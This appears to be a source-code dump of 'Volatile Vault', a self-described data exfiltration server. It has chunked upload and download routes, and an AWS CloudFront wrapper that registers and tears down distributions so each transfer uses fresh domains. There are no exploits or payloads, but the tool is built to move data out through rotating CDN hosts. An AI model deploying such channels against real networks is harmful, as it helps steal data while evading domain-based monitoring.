| }) 329 | ); 330 | 331 | chunkedUpload.use((error, req, res, next) => { 332 | if (error) { 333 | return res.status(413).json({ message: 'Data exceeds size limit' }); 334 | } 335 | next(error); 336 | }); 337 | 338 | chunkedUpload.post( 339 | `/api/${AwsCloudFrontExfilProvider.NAME}/upload/:transferId/chunk/:chunkNo`, 340 | async (req: Request, res: Response) => { 341 | try { 342 | this.logger.info( 343 | `Upload request for ${req.params?.transferId ?? 'n/a'} chunk # ${ 344 | req.params?.chunkNo ?? 'n/a' 345 | } from ${req.ip}` 346 | ); 347 | 348 | const body = req.body as Buffer; 349 | if (!body || !body.length) throw new Error('Missing body'); 350 | 351 | const transferId = req.params?.transferId; 352 | if (!transferId) throw new Error(`Invalid transfer ${transferId}`); 353 | if (!this.uploads.find((t) => t.id === transferId)) 354 | throw new Error(`Unknown transfer ${transferId}`); 355 | 356 | const chunkNo = parseInt(req.params?.chunkNo); 357 | if (Number.isNaN(chunkNo)) 358 | throw new Error(`Invalid chunk number ${transferId}`); 359 | 360 | const result = await this.uploadChunk(transferId, chunkNo, { 361 | stream: Readable.from(body), 362 | size: body.length, 363 | }); 364 | 365 | return res.json({ message: 'Chunk uploaded', ...result }); 366 | } catch (error) { 367 | this.logger.error( 368 | `Error: ${error?.message ?? JSON.stringify(error)}` 369 | ); 370 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 371 | } 372 | } 373 | ); 374 | app.use(chunkedUpload); 375 | 376 | // Kick-off a chunked download 377 | const initChunkDownload = express.Router(); 378 | initChunkDownload.post( 379 | `/api/${AwsCloudFrontExfilProvider.NAME}/initdownload/:id`, 380 | async (req: Request, res: Response) => { 381 | this.logger.info( 382 | `InitChunkDownload request for ${req.params?.id ?? 
'n/a'} from ${ 383 | req.ip 384 | }` 385 | ); 386 | 387 | try { 388 | // Validate file id param 389 | const id = req.params?.id; 390 | if (!id) throw new Error('Missing id'); 391 | 392 | const transferId = await this.initChunkDownload({ id: id }); 393 | const transferData = this.downloads.find((d) => d.id == transferId); 394 | 395 | return res.json({ 396 | message: 'Initialization successful', 397 | hosts: transferData.hosts, 398 | chunks: transferData.chunks.length, 399 | size: transferData.total_size, 400 | id: transferData.id, 401 | }); 402 | } catch (error) { 403 | this.logger.error( 404 | `Error: ${error?.message ?? JSON.stringify(error)}` 405 | ); 406 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 407 | } 408 | } 409 | ); 410 | app.use(initChunkDownload); 411 | 412 | // Download a single chunk 413 | const chunkedDownload = express.Router(); 414 | chunkedDownload.get( 415 | `/api/${AwsCloudFrontExfilProvider.NAME}/download/:transferId/chunk/:chunkNo`, 416 | async (req: Request, res: Response) => { 417 | this.logger.info( 418 | `Download request for ${req.params?.transferId ?? 'n/a'} chunk # ${ 419 | req.params?.chunkNo ?? 'n/a' 420 | } from ${req.ip}` 421 | ); 422 | 423 | try { 424 | const transferId = req.params?.transferId; 425 | if (!transferId) throw new Error(`Invalid transfer ${transferId}`); 426 | if (!this.downloads.find((t) => t.id === transferId)) 427 | throw new Error(`Unknown transfer ${transferId}`); 428 | 429 | const chunkNo = parseInt(req.params?.chunkNo); 430 | if (Number.isNaN(chunkNo)) 431 | throw new Error(`Invalid chunk number ${transferId}`); 432 | 433 | const data = await this.downloadChunk(transferId, chunkNo); 434 | 435 | // Send 436 | res.writeHead(200, { 437 | 'Content-Type': 'application/octet-stream', 438 | 'Content-Length': data.size.toString(), 439 | }); 440 | 441 | for await (const chunk of data.stream) res.write(chunk, 'binary'); 442 | 443 | res.end(); 444 | } catch (error) { 445 | this.logger.error( 446 | `Error: ${error?.message ?? JSON.stringify(error)}` 447 | ); 448 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 449 | } 450 | } 451 | ); 452 | app.use(chunkedDownload); 453 | 454 | const terminateDownload = express.Router(); 455 | terminateDownload.post( 456 | `/api/${AwsCloudFrontExfilProvider.NAME}/download/terminate/:transferId`, 457 | async (req: Request, res: Response) => { 458 | this.logger.info( 459 | `Termination of ${req.params?.transferId ?? 'n/a'} requested from ${ 460 | req.ip 461 | }` 462 | ); 463 | 464 | try { 465 | const transferId = req.params?.transferId; 466 | if (!transferId) throw new Error(`Invalid transfer ${transferId}`); 467 | const transfer = this.downloads.find((t) => t.id === transferId); 468 | if (transfer === undefined) 469 | throw new Error(`Unknown transfer ${transferId}`); 470 | 471 | if (transfer.chunks.find((c) => !c.done)) 472 | throw new Error(`Unfinished download`); 473 | 474 | // Remove all files from disk 475 | for (const chunk of transfer.chunks) 476 | await transfer.fs.removeFile(chunk.fileId); 477 | 478 | // Remove transfer from list 479 | this.downloads = this.downloads.filter((t) => t.id !== transferId); 480 | 481 | // Release domains 482 | if (this.config.download.mode == 'Dynamic') 483 | await this.client.releaseDistributions(transferId); 484 | 485 | return res.json({ message: 'Termination successful' }); 486 | } catch (error) { 487 | this.logger.error( 488 | `Error: ${error?.message ?? 
JSON.stringify(error)}` 489 | ); 490 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 491 | } 492 | } 493 | ); 494 | app.use(terminateDownload); 495 | } 496 | 497 | async initChunkUpload(storage: string, size: number): Promise { 498 | const transferId = TRANSFER_IDS.rnd(); 499 | 500 | const domains = await this.allocateDomainsForTransfer( 501 | transferId, 502 | size, 503 | 'Upload' 504 | ); 505 | 506 | const numChunks = Math.ceil(size / this.chunk_size); 507 | 508 | const transfer = { 509 | id: transferId, 510 | hosts: domains, 511 | chunks: Array.from({ length: numChunks }, (_, key) => { 512 | return { chunkId: key, fileId: null, done: false }; 513 | }), 514 | storage: storage, 515 | total_size: size, 516 | creation: new Date(Date.now()), 517 | fs: new FsUtils(`${AwsCloudFrontExfilProvider.NAME}:${transferId}`), 518 | }; 519 | 520 | this.uploads.push(transfer); 521 | 522 | await transfer.fs.init(path.join(this.config.folder, transfer.id)); 523 | 524 | return transferId; 525 | } 526 | 527 | private async allocateDomainsForTransfer( 528 | transferId: string, 529 | size: number, 530 | transfer: 'Upload' | 'Download' 531 | ): Promise { 532 | const transferConfig = 533 | transfer == 'Upload' ? this.config.upload : this.config.download; 534 | 535 | const calculatedHosts = Math.ceil(size / this.chunk_size); 536 | const limit = 537 | transferConfig.mode == 'Dynamic' 538 | ? transferConfig.max_dynamic_hosts > 0 539 | ? transferConfig.max_dynamic_hosts 540 | : 0 541 | : transferConfig.hosts.length; 542 | const numHosts = 543 | limit > 0 ? Math.min(calculatedHosts, limit) : calculatedHosts; 544 | 545 | if (transferConfig.mode == 'Dynamic') { 546 | // Dynamically allocate domains 547 | this.logger.info( 548 | `Registering ${numHosts} domain(s) for transfer ${transferId}...` 549 | ); 550 | const hostPromises = Array.from({ length: numHosts }, (_, key) => 551 | this.client.registerDomain(`${transferId}-${key}`) 552 | ); 553 | const domains = (await Promise.all(hostPromises)).map( 554 | (r) => r.Distribution.DomainName 555 | ); 556 | this.logger.info( 557 | `Using allocated domains for transfer ${transferId}: ${domains}` 558 | ); 559 | return domains; 560 | } else { 561 | // Use statically (pre-)allocated domains 562 | var idx = 563 | transfer == 'Upload' ? 
this.staticUploadIdx : this.staticDownloadIdx; 564 | const domains = Array.from( 565 | { length: numHosts }, 566 | (_, key) => 567 | transferConfig.hosts[(idx + key) % transferConfig.hosts.length] 568 | ); 569 | if (transfer == 'Upload') this.staticUploadIdx += numHosts; 570 | else this.staticDownloadIdx += numHosts; 571 | this.logger.info( 572 | `Using pre-allocated domains for transfer ${transferId}: ${domains}` 573 | ); 574 | return domains; 575 | } 576 | } 577 | 578 | async uploadChunk( 579 | transferId: string, 580 | chunkNo: number, 581 | data: BinaryData 582 | ): Promise { 583 | const transfer = this.uploads.find((t) => t.id === transferId); 584 | if (chunkNo < 0 || chunkNo >= transfer.chunks.length) 585 | throw new Error(`Invalid chunk number ${chunkNo}`); 586 | 587 | if (transfer.chunks[chunkNo].done) 588 | throw new Error(`Chunk ${chunkNo} already uploaded`); 589 | 590 | this.logger.debug(`Saving chunk ${chunkNo} of ${transferId}...`); 591 | const info = await transfer.fs.putFile(data.stream); 592 | transfer.chunks[chunkNo].fileId = info.id; 593 | transfer.chunks[chunkNo].done = true; 594 | 595 | // If there are still missing chunks, return empty file info 596 | if (transfer.chunks.find((c) => !c.done)) return {}; 597 | 598 | // Else, assemble file and move to storage 599 | const storage = ExtensionRepository.getInstance().getStorage( 600 | transfer.storage 601 | ); 602 | 603 | this.logger.debug(`Retrieving all files of ${transferId}...`); 604 | const files = await Promise.all( 605 | transfer.chunks.map(async (c) => { 606 | const fileInfo = await transfer.fs.getFile(c.fileId); 607 | return fileInfo; 608 | }) 609 | ); 610 | 611 | const multistream = new MultiStream(files.map((f) => f[0])); 612 | 613 | this.logger.debug( 614 | `Storing combined data of ${transferId} to ${storage.name}...` 615 | ); 616 | const storageInfo = await storage.store({ 617 | size: files.reduce((sum, file) => sum + file[1], 0), 618 | stream: multistream, 619 | }); 620 | 621 | this.logger.debug(`Clearing temporary files of ${transferId}...`); 622 | for (const chunk of transfer.chunks) 623 | await transfer.fs.removeFile(chunk.fileId); 624 | 625 | this.logger.info(`Transfer ${transferId} completed successfully!`); 626 | 627 | // Close transfer: remove transfer from list & release domains 628 | this.uploads = this.uploads.filter((t) => t.id !== transferId); 629 | if (this.config.upload.mode == 'Dynamic') 630 | await this.client.releaseDistributions(transferId); 631 | 632 | // TODO: How do we handle termination date info (for UI) here? 
633 | return { id: storageInfo.id, url: storageInfo.url }; 634 | } 635 | 636 | async initChunkDownload(info: FileInformation): Promise { 637 | const transferId = TRANSFER_IDS.rnd(); 638 | const storage = await ExtensionRepository.getInstance().getStorageForFile( 639 | info.id 640 | ); 641 | var data = await storage.retrieve({ id: info.id }); 642 | 643 | const domains = await this.allocateDomainsForTransfer( 644 | transferId, 645 | data.size, 646 | 'Download' 647 | ); 648 | 649 | const numChunks = Math.ceil(data.size / this.chunk_size); 650 | 651 | const transfer: DownloadTransferData = { 652 | total_size: data.size, 653 | chunks: Array.from({ length: numChunks }, (_, key) => { 654 | return { chunkId: key, fileId: null, done: false }; 655 | }), 656 | id: transferId, 657 | storage: storage.name, 658 | hosts: domains, 659 | creation: new Date(Date.now()), 660 | fs: new FsUtils(`${AwsCloudFrontExfilProvider.NAME}:${transferId}`), 661 | }; 662 | 663 | await transfer.fs.init(path.join(this.config.folder, transferId)); 664 | 665 | this.logger.info(`Writing file into ${numChunks} chunk files...`); 666 | 667 | await readFixedChunks( 668 | data.stream, 669 | this.chunk_size, 670 | async (chunk: Buffer, count: number) => { 671 | const fileInfo = await transfer.fs.putFile(Readable.from(chunk)); 672 | transfer.chunks[count].fileId = fileInfo.id; 673 | this.logger.debug( 674 | `Chunk #${count}: ${chunk.length} bytes: ${fileInfo.id}` 675 | ); 676 | } 677 | ); 678 | 679 | this.downloads.push(transfer); 680 | 681 | return transferId; 682 | } 683 | 684 | async downloadChunk( 685 | transferId: string, 686 | chunkNo: number 687 | ): Promise { 688 | const transfer = this.downloads.find((t) => t.id === transferId); 689 | const chunk = transfer.chunks.find((c) => c.chunkId == chunkNo); 690 | 691 | if (chunk === undefined) throw new Error(`Chunk ${chunkNo} not found`); 692 | 693 | this.logger.debug(`Saving chunk ${chunkNo} of ${transferId}...`); 694 | const [stream, size] = await transfer.fs.getFile(chunk.fileId); 695 | chunk.done = true; 696 | 697 | return { size, stream }; 698 | } 699 | 700 | uploadSingle( 701 | storage: string, 702 | data: BinaryData 703 | ): Promise { 704 | throw new Error('Method not supported.'); 705 | } 706 | downloadSingle(info: FileInformation): Promise { 707 | throw new Error('Method not supported.'); 708 | } 709 | addHost(): Promise { 710 | throw new Error('Method not implemented.'); 711 | } 712 | removeHost(host: string): Promise { 713 | throw new Error('Method not implemented.'); 714 | } 715 | } 716 | -------------------------------------------------------------------------------- /server/src/extensions/exfil/AwsCloudFront/distributionconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "CallerReference": "CHANGEME", 3 | "Comment": "VolatileVault-Cloudfront-Distribution", 4 | "DefaultCacheBehavior": { 5 | "TargetOriginId": "CHANGEME", 6 | "ViewerProtocolPolicy": "https-only", 7 | "AllowedMethods": { 8 | "Quantity": 7, 9 | "Items": ["HEAD", "DELETE", "POST", "GET", "OPTIONS", "PUT", "PATCH"], 10 | "CachedMethods": { 11 | "Quantity": 2, 12 | "Items": ["HEAD", "GET"] 13 | } 14 | }, 15 | "Compress": false, 16 | "CachePolicyId": "4135ea2d-6df8-44a3-9df3-4b5a84be39ad", 17 | "TrustedSigners": { 18 | "Enabled": false, 19 | "Quantity": 0 20 | } 21 | }, 22 | "Enabled": true, 23 | "Origins": { 24 | "Quantity": 1, 25 | "Items": [ 26 | { 27 | "Id": "CHANGEME", 28 | "DomainName": "CHANGEME", 29 | "CustomOriginConfig": { 30 | "HTTPPort": 80, 31 | 
"HTTPSPort": 443, 32 | "OriginProtocolPolicy": "https-only", 33 | "OriginReadTimeout": 30, 34 | "OriginKeepaliveTimeout": 5 35 | } 36 | } 37 | ] 38 | }, 39 | "Aliases": { 40 | "Quantity": 0 41 | }, 42 | "CacheBehaviors": { 43 | "Quantity": 0 44 | }, 45 | "Logging": { 46 | "Enabled": false, 47 | "IncludeCookies": false, 48 | "Bucket": "", 49 | "Prefix": "" 50 | }, 51 | "PriceClass": "PriceClass_All", 52 | "ViewerCertificate": { 53 | "CloudFrontDefaultCertificate": true 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /server/src/extensions/exfil/AwsCloudFront/wrapper.ts: -------------------------------------------------------------------------------- 1 | import { 2 | CachePolicySummary, 3 | CloudFront, 4 | CreateCachePolicyCommand, 5 | CreateCachePolicyRequest, 6 | CreateDistributionCommand, 7 | CreateDistributionRequest, 8 | DeleteDistributionCommand, 9 | DistributionConfig, 10 | DistributionSummary, 11 | GetDistributionCommand, 12 | GetDistributionResult, 13 | ListCachePoliciesCommand, 14 | ListDistributionsCommand, 15 | UpdateDistributionCommand, 16 | } from '@aws-sdk/client-cloudfront'; 17 | import { Logger } from '../../../logging'; 18 | import winston from 'winston'; 19 | import distributionconfig from './distributionconfig.json'; 20 | 21 | export class CloudFrontWrapper { 22 | private client: CloudFront; 23 | private logger: winston.Logger; 24 | private distributionTag: string; 25 | private domain: string; 26 | private cachePolicyId: string; 27 | 28 | public constructor( 29 | accessKeyId: string, 30 | secretAccessKey: string, 31 | region: string, 32 | distributionTag: string, 33 | domain: string 34 | ) { 35 | this.client = new CloudFront({ 36 | credentials: { 37 | accessKeyId, 38 | secretAccessKey, 39 | }, 40 | apiVersion: 'latest', 41 | region, 42 | }); 43 | this.distributionTag = distributionTag; 44 | this.domain = domain; 45 | this.logger = Logger.Instance.createChildLogger('AwsCloudFrontWrapper'); 46 | } 47 | 48 | public async validateCredentials(): Promise { 49 | try { 50 | const res = await this.client.send( 51 | new ListDistributionsCommand({ MaxItems: 1 }) 52 | ); 53 | return true; 54 | } catch (error) { 55 | this.logger.error( 56 | `Failed validating AWS CloudFront credentials: ${ 57 | error?.message ?? 
error 58 | }` 59 | ); 60 | return false; 61 | } 62 | } 63 | 64 | public async listDistributionsByTransferId( 65 | transferId: string 66 | ): Promise { 67 | let distributionSummaries: DistributionSummary[] = []; 68 | let marker: string | undefined = undefined; 69 | 70 | do { 71 | const command = new ListDistributionsCommand({ Marker: marker }); 72 | const response = await this.client.send(command); 73 | 74 | const filteredDistributions = 75 | response.DistributionList?.Items?.filter((distribution) => { 76 | return distribution.Origins.Items.some((origin) => 77 | origin.Id.includes(transferId) 78 | ); 79 | }) || []; 80 | 81 | distributionSummaries.push(...filteredDistributions); 82 | 83 | marker = response.DistributionList.NextMarker; 84 | } while (marker); 85 | 86 | return distributionSummaries; 87 | } 88 | 89 | public async getCachePolicyId(): Promise { 90 | this.cachePolicyId = await this.getOrCreateCachePolicy(); 91 | } 92 | 93 | private async getOrCreateCachePolicy(): Promise { 94 | const policyName = 'VolatileVault-IncludeAuthorizationHeaderPolicy'; 95 | 96 | // Check if the cache policy already exists 97 | const existingPolicyId = await this.findCachePolicyIdByName(policyName); 98 | if (existingPolicyId) { 99 | return existingPolicyId; 100 | } 101 | 102 | // Create a new cache policy 103 | const policyConfig: CreateCachePolicyRequest = { 104 | CachePolicyConfig: { 105 | Name: policyName, 106 | DefaultTTL: 86400, // One day 107 | MaxTTL: 31536000, // One year 108 | MinTTL: 0, 109 | ParametersInCacheKeyAndForwardedToOrigin: { 110 | EnableAcceptEncodingBrotli: true, 111 | EnableAcceptEncodingGzip: true, 112 | HeadersConfig: { 113 | HeaderBehavior: 'whitelist', 114 | Headers: { 115 | Quantity: 1, 116 | Items: ['Authorization'], 117 | }, 118 | }, 119 | CookiesConfig: { 120 | CookieBehavior: 'none', 121 | }, 122 | QueryStringsConfig: { 123 | QueryStringBehavior: 'none', 124 | }, 125 | }, 126 | }, 127 | }; 128 | 129 | const command = new CreateCachePolicyCommand(policyConfig); 130 | const response = await this.client.send(command); 131 | 132 | return response.CachePolicy?.Id!; 133 | } 134 | 135 | private async findCachePolicyIdByName( 136 | policyName: string 137 | ): Promise { 138 | const command = new ListCachePoliciesCommand({}); 139 | const response = await this.client.send(command); 140 | 141 | const policy = response.CachePolicyList?.Items?.find( 142 | (item: CachePolicySummary) => 143 | item.CachePolicy?.CachePolicyConfig?.Name === policyName 144 | ); 145 | return policy?.CachePolicy?.Id; 146 | } 147 | 148 | public async releaseDistributions(transferId: string): Promise { 149 | try { 150 | const distributions = await this.listDistributionsByTransferId( 151 | transferId 152 | ); 153 | for (const distribution of distributions) { 154 | this.releaseDomain(distribution.Id); 155 | } 156 | } catch (error) { 157 | // TODO: Catch ratelimiting error and retry automatically after waiting 158 | this.logger.error( 159 | `Error releasing CloudFront domains: ${error?.message ?? 
error}` 160 | ); 161 | throw error; 162 | } 163 | } 164 | 165 | public async areDistributionsReady(transferId: string): Promise { 166 | try { 167 | const distributions = await this.listDistributionsByTransferId( 168 | transferId 169 | ); 170 | if (distributions.length === 0) throw new Error('No distributions found'); 171 | 172 | for (const distribution of distributions) { 173 | if (distribution.Status !== 'Deployed') { 174 | return false; 175 | } 176 | } 177 | return true; 178 | } catch (error) { 179 | throw error; 180 | } 181 | } 182 | 183 | public async registerDomain( 184 | transferIdAndCount: string 185 | ): Promise { 186 | const config = this.getDistributionConfig(transferIdAndCount); 187 | const input: CreateDistributionRequest = { DistributionConfig: config }; 188 | const command = new CreateDistributionCommand(input); 189 | 190 | try { 191 | const data: GetDistributionResult = await this.client.send(command); 192 | this.logger.info(`Domain created: ${data.Distribution?.DomainName}`); 193 | return data; 194 | } catch (error) { 195 | this.logger.error( 196 | `Failed registering domain: ${error?.message ?? error}` 197 | ); 198 | throw error?.message ?? error; 199 | } 200 | } 201 | 202 | public async releaseDomain(id: string): Promise { 203 | // Get the current distribution config 204 | const getDistCommand = new GetDistributionCommand({ Id: id }); 205 | const getDistResponse = await this.client.send(getDistCommand); 206 | 207 | if (getDistResponse.Distribution.DistributionConfig.Enabled) { 208 | // Update the distribution to disable it 209 | const updateDistCommand = new UpdateDistributionCommand({ 210 | Id: id, 211 | IfMatch: getDistResponse.ETag, // Use the ETag from the get operation 212 | DistributionConfig: { 213 | ...getDistResponse.Distribution.DistributionConfig, 214 | Enabled: false, // Disable the distribution 215 | }, 216 | }); 217 | await this.client.send(updateDistCommand); 218 | this.logger.debug(`CloudFront distribution disabled: ${id}`); 219 | } 220 | 221 | // Wait until the distribution is fully disabled and the status is 'Deployed' 222 | const latestEtag = await this.waitForDistributionDeployed( 223 | id, 224 | getDistResponse.ETag 225 | ); 226 | 227 | // Once disabled, delete the distribution 228 | const deleteCommand = new DeleteDistributionCommand({ 229 | Id: id, 230 | IfMatch: latestEtag, // Use the latest ETag from the waitForDistributionDeployed function 231 | }); 232 | await this.client.send(deleteCommand); 233 | this.logger.info(`CloudFront distribution deleted: ${id}`); 234 | } 235 | 236 | private async waitForDistributionDeployed( 237 | distributionId: string, 238 | etag: string 239 | ): Promise { 240 | // Helper function to wait for a specified number of milliseconds 241 | const delay = (ms: number) => 242 | new Promise((resolve) => setTimeout(resolve, ms)); 243 | const command = new GetDistributionCommand({ Id: distributionId }); 244 | 245 | let status = ''; 246 | do { 247 | this.logger.debug( 248 | `Waiting 30s for distribution ${distributionId} to finish deployment...` 249 | ); 250 | await delay(30000); // 30 seconds 251 | 252 | // Retrieve the distribution information 253 | const response = await this.client.send(command); 254 | status = response.Distribution.Status; 255 | 256 | // Check if the ETag has changed and use the latest one 257 | if (response.ETag !== etag) { 258 | etag = response.ETag; 259 | } 260 | } while (status !== 'Deployed'); 261 | 262 | // Make sure to return the latest ETag to use for the delete operation 263 | return etag; 264 | } 
265 | 266 | private getDistributionConfig( 267 | transferIdAndCount: string 268 | ): DistributionConfig { 269 | var cfg = structuredClone(distributionconfig) as DistributionConfig; 270 | 271 | cfg.CallerReference = 272 | cfg.CallerReference = `[VolatileVault] ${this.distributionTag} ${transferIdAndCount};`; 273 | cfg.DefaultCacheBehavior.TargetOriginId = transferIdAndCount; 274 | cfg.Origins.Items[0].DomainName = this.domain; 275 | cfg.Origins.Items[0].Id = transferIdAndCount; 276 | cfg.DefaultCacheBehavior.CachePolicyId = this.cachePolicyId; 277 | 278 | return cfg; 279 | } 280 | } 281 | -------------------------------------------------------------------------------- /server/src/extensions/exfil/BasicHttp/README.md: -------------------------------------------------------------------------------- 1 |
2 | 3 |

Volatile Vault - BasicHttp Exfil

4 |
5 |
6 | 7 | This exfil allows Volatile Vault to upload files to and download them from the very same backend where its API is running on. 8 | 9 | # Configuration 10 | 11 | Example: 12 | 13 | ```yaml 14 | --- 15 | exfil: 16 | basichttp: 17 | max_total_size: 104857600 18 | hosts: 19 | - 'https://my.cool.site' 20 | ``` 21 | 22 | Fields: 23 | 24 | - `max_total_size`: Maximum allowed size of a single data transfer (upload or download). 25 | - `hosts`: (Optional) List of hosts the frontend may use to proxy data transfers through. 26 | -------------------------------------------------------------------------------- /server/src/extensions/exfil/BasicHttp/basichttp.ts: -------------------------------------------------------------------------------- 1 | import bodyParser from 'body-parser'; 2 | import express, { Express, Request, Response } from 'express'; 3 | import { Readable } from 'node:stream'; 4 | import winston from 'winston'; 5 | import { Config, ExfilBasicHTTP } from '../../../config/config'; 6 | import { BaseExtension, ExtensionInfo, FileUploadInformation } from '../../extension'; 7 | import { ExtensionRepository } from '../../repository'; 8 | import { Logger } from '../../../logging'; 9 | import { 10 | BinaryData, 11 | ExfilProvider, 12 | ExfilProviderCapabilities, 13 | FileInformation, 14 | } from '../provider'; 15 | 16 | export class BasicHTTPExfilProvider 17 | extends BaseExtension 18 | implements ExfilProvider 19 | { 20 | private static NAME: string = 'basichttp'; 21 | private logger: winston.Logger; 22 | 23 | public constructor() { 24 | super(BasicHTTPExfilProvider.NAME, ['DownloadSingle', 'UploadSingle']); 25 | this.logger = Logger.Instance.createChildLogger('BasicHTTP'); 26 | } 27 | 28 | get config(): ExfilBasicHTTP { 29 | return this.cfg.exfil.basichttp; 30 | } 31 | 32 | get clientConfig(): ExtensionInfo { 33 | return { 34 | name: BasicHTTPExfilProvider.NAME, 35 | displayName: 'Built-in HTTP', 36 | info: this.config, 37 | }; 38 | } 39 | 40 | async init(cfg: Config): Promise { 41 | this.cfg = cfg; 42 | if (this.config) { 43 | this.logger.info('Initialized'); 44 | this.register(); 45 | this.state = 'Initialized'; 46 | } else { 47 | this.logger.debug('Config not set'); 48 | this.state = 'Unconfigured'; 49 | } 50 | } 51 | 52 | protected register() { 53 | ExtensionRepository.getInstance().registerExfil(this); 54 | } 55 | 56 | get hosts(): Promise { 57 | return Promise.resolve(this.config.hosts); 58 | } 59 | 60 | installRoutes(app: Express): Promise { 61 | // Upload 62 | const uploadRoute = express.Router(); 63 | 64 | uploadRoute.use( 65 | bodyParser.raw({ 66 | limit: this.config.max_total_size, 67 | type: 'application/octet-stream', 68 | }) 69 | ); 70 | 71 | uploadRoute.use((error, req, res, next) => { 72 | if (error) { 73 | return res.status(413).json({ message: 'Data exceeds size limit' }); 74 | } 75 | next(error); 76 | }); 77 | 78 | uploadRoute.post( 79 | `/api/${BasicHTTPExfilProvider.NAME}/upload/:storage`, 80 | async (req: Request, res: Response) => { 81 | this.logger.info( 82 | `Upload request to ${req.params?.storage ?? 
'n/a'} from ${req.ip}` 83 | ); 84 | 85 | try { 86 | // Validate storage param 87 | const storageName = req.params?.storage; 88 | if (!storageName) throw new Error('Missing storage'); 89 | 90 | const storage = 91 | ExtensionRepository.getInstance().getStorage(storageName); 92 | 93 | // Validate body 94 | const body = req.body as Buffer; 95 | if (!body || !body.length) throw new Error('Missing body'); 96 | 97 | this.logger.debug(`Storing using ${storageName}`); 98 | const result = await this.uploadSingle(storageName, { 99 | stream: Readable.from(body), 100 | size: body.length, 101 | }); 102 | 103 | this.logger.debug('Store successful!'); 104 | res.json({ 105 | ...result, 106 | message: 'Upload successful', 107 | lifeTime: storage.config.file_expiry * 1000 * 60, 108 | }); 109 | } catch (error) { 110 | this.logger.error( 111 | `Error: ${error?.message ?? JSON.stringify(error)}` 112 | ); 113 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 114 | } 115 | } 116 | ); 117 | app.use(uploadRoute); 118 | 119 | // Download 120 | const downloadRoute = express.Router(); 121 | downloadRoute.use(bodyParser.json()); 122 | 123 | downloadRoute.get( 124 | `/api/${BasicHTTPExfilProvider.NAME}/download/:id`, 125 | async (req: Request, res: Response) => { 126 | this.logger.info( 127 | `Download request for ${req.params?.id ?? 'n/a'} from ${req.ip}` 128 | ); 129 | 130 | try { 131 | // Validate file id param 132 | const id = req.params?.id; 133 | if (!id) throw new Error('Missing id'); 134 | 135 | // Acquire data 136 | const data = await this.downloadSingle({ id: id }); 137 | 138 | // Send 139 | res.writeHead(200, { 140 | 'Content-Type': 'application/octet-stream', 141 | 'Content-Length': data.size.toString(), 142 | }); 143 | 144 | for await (const chunk of data.stream) res.write(chunk, 'binary'); 145 | 146 | res.end(); 147 | } catch (error) { 148 | this.logger.error( 149 | `Error: ${error?.message ?? JSON.stringify(error)}` 150 | ); 151 | return res.status(400).json({ message: error?.message ?? 
'Failure' }); 152 | } 153 | } 154 | ); 155 | app.use(downloadRoute); 156 | 157 | return Promise.resolve(); 158 | } 159 | 160 | async uploadSingle( 161 | storageName: string, 162 | data: BinaryData 163 | ): Promise { 164 | // Validate specified storage 165 | var storage = ExtensionRepository.getInstance().getStorage(storageName); 166 | 167 | // Store file 168 | var file = await storage.store(data); 169 | return { 170 | id: file.id, 171 | url: file.url 172 | }; 173 | } 174 | 175 | async downloadSingle(info: FileInformation): Promise { 176 | const storage = await ExtensionRepository.getInstance().getStorageForFile(info.id); 177 | var data = await storage.retrieve({ id: info.id }); 178 | 179 | return data; 180 | } 181 | 182 | // Unsupported methods 183 | initChunkDownload(info: FileInformation): Promise { 184 | throw new Error('Method not supported.'); 185 | } 186 | initChunkUpload(storage: string, size: number): Promise { 187 | throw new Error('Method not supported.'); 188 | } 189 | uploadChunk(transferId: string, chunkNo: number, data: BinaryData): Promise { 190 | throw new Error('Method not supported.'); 191 | } 192 | downloadChunk(transferId: string, chunkNo: number): Promise { 193 | throw new Error('Method not supported.'); 194 | } 195 | addHost(): Promise { 196 | throw new Error('Method not supported.'); 197 | } 198 | removeHost(host: string): Promise { 199 | throw new Error('Method not supported.'); 200 | } 201 | } 202 | -------------------------------------------------------------------------------- /server/src/extensions/exfil/provider.ts: -------------------------------------------------------------------------------- 1 | import { Readable } from 'node:stream'; 2 | import { Extension, FileUploadInformation } from '../extension'; 3 | import express from 'express'; 4 | import { BaseExfil } from '../../config/config'; 5 | 6 | /** 7 | * Holds information about a stored item, can be extended by individual storage providers 8 | * 9 | * @export 10 | * @interface FileInformation 11 | * @typedef {FileInformation} 12 | */ 13 | export interface FileInformation { 14 | id: string; // ID of an uploaded item 15 | } 16 | 17 | /** 18 | * Enum that lets exfil providers declare their supported capabilities 19 | * 20 | * @export 21 | * @enum {number} 22 | */ 23 | export type ExfilProviderCapabilities = 24 | | 'None' 25 | | 'UploadSingle' 26 | | 'DownloadSingle' 27 | | 'UploadChunked' 28 | | 'DownloadChunked' 29 | | 'AddHost' 30 | | 'RemoveHost'; 31 | 32 | /** 33 | * Holds a binary stream and its length 34 | * 35 | * @export 36 | * @interface BinaryData 37 | * @typedef {BinaryData} 38 | */ 39 | export interface BinaryData { 40 | // TODO: same as server\src\storage\provider.ts:StorageData, define single central interface instead 41 | stream: Readable; // Stream to read binary contents from 42 | size: number; // Length of stream 43 | } 44 | 45 | /** 46 | * Basic interface for file upload/download 47 | * 48 | * @export 49 | * @interface ExfilProvider 50 | * @typedef {ExfilProvider} 51 | */ 52 | export interface ExfilProvider extends Extension { 53 | get hosts(): Promise; 54 | get config(): BaseExfil; 55 | 56 | /** 57 | * Allows extensions to install their own routes 58 | * 59 | * @param {express.Express} app 60 | * @returns {Promise} 61 | */ 62 | installRoutes(app: express.Express): Promise; 63 | 64 | // Simple up/downloads 65 | uploadSingle( 66 | storage: string, 67 | data: BinaryData 68 | ): Promise; 69 | downloadSingle(info: FileInformation): Promise; 70 | 71 | // Chunked up/downloads 72 | 
